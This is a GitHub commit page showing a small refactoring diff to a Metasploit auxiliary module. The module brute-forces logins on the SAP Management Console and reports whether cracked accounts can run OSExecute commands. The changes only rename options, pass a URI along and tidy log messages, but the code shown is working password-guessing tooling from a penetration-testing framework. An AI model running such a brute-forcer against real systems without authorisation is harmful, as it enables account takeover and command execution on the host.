Further tidies

rapid7 · Jun 7, 2014 · b997c2a · b997c2a
1 parent 0e3549e
commit b997c2a
Showing 1 changed file with 16 additions and 14 deletions.
diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
@@ -34,41 +34,42 @@ def initialize
       [
         Opt::RPORT(50013),
         OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
-        OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
+        OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
         OptPath.new('USER_FILE', [ false, "File containing users, one per line",
                                    File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
       ], self.class)
     register_autofilter_ports([ 50013 ])
   end
 
-  def run_host(ip)
+  def run_host(rhost)
+    uri = normalize_uri(target_uri.path)
     res = send_request_cgi({
-      'uri'     => normalize_uri(datastore['URI']),
+      'uri'     => uri,
       'method'  => 'GET'
     })
 
     if not res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
       return
     end
 
     print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']
 
     each_user_pass do |user, pass|
-      enum_user(user,pass)
+      enum_user(user,pass,uri)
     end
 
   end
 
-  def enum_user(user, pass)
+  def enum_user(user, pass, uri)
 
     # Replace placeholder with SAP SID, if present
     if datastore['SAP_SID']
       user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
       pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
     end
 
-    print_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
+    print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -93,7 +94,7 @@ def enum_user(user, pass)
 
     begin
       res = send_request_raw({
-        'uri'      => normalize_uri(datastore['URI']),
+        'uri'      => uri,
         'method'   => 'POST',
         'data'     => data,
         'headers'  =>
@@ -105,7 +106,7 @@ def enum_user(user, pass)
           }
       })
 
-      return if not res
+      return unless res
 
       if (res.code != 500 and res.code != 200)
         return
@@ -126,17 +127,17 @@ def enum_user(user, pass)
       end
 
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] #{rhost}] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] Successful login '#{user}' password: '#{pass}'")
+      print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")
 
       if permission
-        vprint_good("#{rhost}:#{rport} [SAP] Login '#{user}' authorized to perform OSExecute calls")
+        vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
       else
-        vprint_error("#{rhost}:#{rport} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
+        vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
       end
 
       report_auth_info(
@@ -151,7 +152,8 @@ def enum_user(user, pass)
         :target_port => rport
       )
     else
-      vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'")
+      vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
     end
   end
 end
+